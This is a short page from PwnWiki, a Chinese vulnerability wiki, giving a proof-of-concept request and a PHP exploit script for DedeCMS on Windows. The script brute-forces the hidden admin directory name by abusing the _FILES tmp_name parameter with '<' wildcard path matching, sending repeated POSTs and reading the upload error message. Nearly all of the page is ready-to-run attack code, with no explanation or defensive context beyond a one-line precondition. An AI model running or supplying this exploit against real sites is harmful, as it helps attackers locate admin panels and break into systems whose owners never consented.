免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
前提条件
仅Windows系统
POC
http://localhost/dedecms/tags.php post: dopost=save&_FILESb4dboytmp_name=./de</images/admin_top_logo.gif&_FILESb4dboyname=0&_FILESb4dboysize=0&_FILESb4dboytype=image/gif
EXP
<?php
$domain='http://localhost/dedecms/';
$url=$domain.'/index.php';
function post($url, $data, $cookie = '') {
$options = array(
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HEADER => true,
CURLOPT_POST => true,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_COOKIE => $cookie,
CURLOPT_POSTFIELDS => $data,
);
$ch = curl_init($url);
curl_setopt_array($ch, $options);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}
$testlen=25;
$str=range('a','z');
$number=range(0,9,1);
$dic = array_merge($str, $number);
$n=true;
$nn=true;
$path='';
while($n){
foreach($dic as $v){
foreach($dic as $vv){
#echo $v.$vv .'----';
$post_data="dopost=save&_FILESb4dboytmp_name=./$v$vv</images/admin_top_logo.gif&_FILESb4dboyname=0&_FILESb4dboysize=0&_FILESb4dboytype=image/gif";
$result=post($url,$post_data);
if(strpos($result,'Upload filetype not allow !') === false){
$path=$v.$vv;$n=false;break 2;
}
}
}
}
while($nn){
foreach($dic as $vvv){
$post_data="dopost=save&_FILESb4dboytmp_name=./$path$vvv</images/admin_top_logo.gif&_FILESb4dboyname=0&_FILESb4dboysize=0&_FILESb4dboytype=image/gif";
$result=post($url,$post_data);
if(strpos($result,'Upload filetype not allow !') === false){
$path.=$vvv;
echo $path . PHP_EOL;
$giturl=$domain.'/'.$path.'/images/admin_top_logo.gif';
if(@file_get_contents($giturl)){
echo $domain.'/'.$path.'/';
$nn=false;break 2;
}
}
}
}
?>
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
